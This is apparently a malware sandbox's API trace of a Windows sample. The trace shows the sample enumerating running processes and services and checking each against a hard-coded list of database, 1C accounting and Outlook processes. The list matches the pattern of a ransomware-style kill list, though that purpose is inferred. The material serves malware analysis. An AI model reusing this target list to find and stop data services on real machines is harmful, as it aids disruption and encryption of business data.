	[0165.551] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0165.551] lstrlenW (lpString="reader_sl.exe") returned 13
	[0165.551] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0165.551] lstrlenW (lpString="drvinst.exe") returned 11
	[0165.551] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0165.552] lstrlenW (lpString="taskhost.exe") returned 12
	[0165.552] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1
	[0165.552] lstrlenW (lpString="consent.exe") returned 11
	[0165.552] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 0
	[0165.552] CloseHandle (hObject=0x3e8) returned 1
	[0165.552] Sleep (dwMilliseconds=0x1f4) 
	[0166.280] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0166.281] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0166.281] GetLastError () returned 0xea
	[0166.281] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0x7ba6360
	[0166.281] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0166.281] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0166.282] lstrlenW (lpString="Appinfo") returned 7
	[0166.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0166.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0166.282] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0166.282] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0166.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0166.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0166.282] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0166.282] lstrlenW (lpString="AudioSrv") returned 8
	[0166.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0166.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0166.282] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0166.282] lstrlenW (lpString="BFE") returned 3
	[0166.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0166.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0166.282] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0166.282] lstrlenW (lpString="CryptSvc") returned 8
	[0166.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0166.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0166.282] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0166.283] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0166.283] lstrlenW (lpString="CscService") returned 10
	[0166.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0166.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0166.283] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0166.283] lstrlenW (lpString="DcomLaunch") returned 10
	[0166.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0166.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0166.283] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0166.283] lstrlenW (lpString="Dhcp") returned 4
	[0166.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0166.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0166.283] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0166.283] lstrlenW (lpString="Dnscache") returned 8
	[0166.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0166.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0166.283] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0166.283] lstrlenW (lpString="DPS") returned 3
	[0166.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0166.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0166.283] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0166.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0166.283] lstrlenW (lpString="eventlog") returned 8
	[0166.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0166.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0166.284] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0166.284] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0166.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0166.284] lstrlenW (lpString="EventSystem") returned 11
	[0166.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0166.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0166.284] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0166.284] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0166.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0166.284] lstrlenW (lpString="gpsvc") returned 5
	[0166.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0166.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0166.284] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0166.284] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0166.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0166.284] lstrlenW (lpString="iphlpsvc") returned 8
	[0166.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0166.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0166.284] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0166.284] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0166.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0166.284] lstrlenW (lpString="LanmanServer") returned 12
	[0166.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0166.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0166.284] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0166.284] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0166.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0166.284] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0166.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0166.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0166.284] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0166.284] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0166.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0166.284] lstrlenW (lpString="lmhosts") returned 7
	[0166.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0166.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0166.285] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0166.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0166.285] lstrlenW (lpString="MMCSS") returned 5
	[0166.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0166.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0166.285] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0166.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0166.285] lstrlenW (lpString="MpsSvc") returned 6
	[0166.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0166.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0166.285] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0166.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0166.285] lstrlenW (lpString="Netman") returned 6
	[0166.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0166.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0166.285] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0166.285] lstrlenW (lpString="netprofm") returned 8
	[0166.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0166.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0166.285] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0166.285] lstrlenW (lpString="NlaSvc") returned 6
	[0166.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0166.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0166.285] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0166.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0166.286] lstrlenW (lpString="nsi") returned 3
	[0166.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0166.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0166.286] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0166.286] lstrlenW (lpString="PcaSvc") returned 6
	[0166.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0166.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0166.286] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0166.286] lstrlenW (lpString="PlugPlay") returned 8
	[0166.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0166.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0166.286] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0166.286] lstrlenW (lpString="Power") returned 5
	[0166.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0166.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0166.286] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0166.286] lstrlenW (lpString="ProfSvc") returned 7
	[0166.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0166.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0166.286] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0166.286] lstrlenW (lpString="RpcEptMapper") returned 12
	[0166.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0166.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0166.286] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0166.286] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0166.287] lstrlenW (lpString="RpcSs") returned 5
	[0166.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0166.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0166.287] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0166.287] lstrlenW (lpString="SamSs") returned 5
	[0166.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0166.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0166.287] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0166.287] lstrlenW (lpString="Schedule") returned 8
	[0166.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0166.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0166.287] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0166.287] lstrlenW (lpString="SENS") returned 4
	[0166.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0166.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0166.287] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0166.287] lstrlenW (lpString="ShellHWDetection") returned 16
	[0166.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0166.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0166.287] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0166.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0166.287] lstrlenW (lpString="Spooler") returned 7
	[0166.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0166.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0166.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0166.288] lstrlenW (lpString="SysMain") returned 7
	[0166.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0166.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0166.288] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0166.288] lstrlenW (lpString="Themes") returned 6
	[0166.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0166.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0166.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0166.288] lstrlenW (lpString="TrkWks") returned 6
	[0166.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0166.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0166.288] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0166.288] lstrlenW (lpString="UxSms") returned 5
	[0166.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0166.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0166.288] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0166.288] lstrlenW (lpString="WdiServiceHost") returned 14
	[0166.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0166.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0166.288] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0166.288] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0166.289] lstrlenW (lpString="WdiSystemHost") returned 13
	[0166.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0166.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0166.289] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0166.289] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0166.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0166.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0166.289] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0166.289] lstrlenW (lpString="Winmgmt") returned 7
	[0166.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0166.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0166.289] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0166.289] lstrlenW (lpString="WPDBusEnum") returned 10
	[0166.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0166.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0166.289] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0166.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0166.289] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0166.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d0
	[0166.291] Process32FirstW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0166.292] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0166.292] lstrlenW (lpString="System") returned 6
	[0166.292] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0166.292] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0166.292] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0166.292] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0166.292] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0166.292] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0166.292] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0166.292] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0166.292] lstrlenW (lpString="smss.exe") returned 8
	[0166.292] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0166.293] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0166.293] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0166.293] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0166.293] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0166.293] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0166.293] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0166.293] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0166.293] lstrlenW (lpString="csrss.exe") returned 9
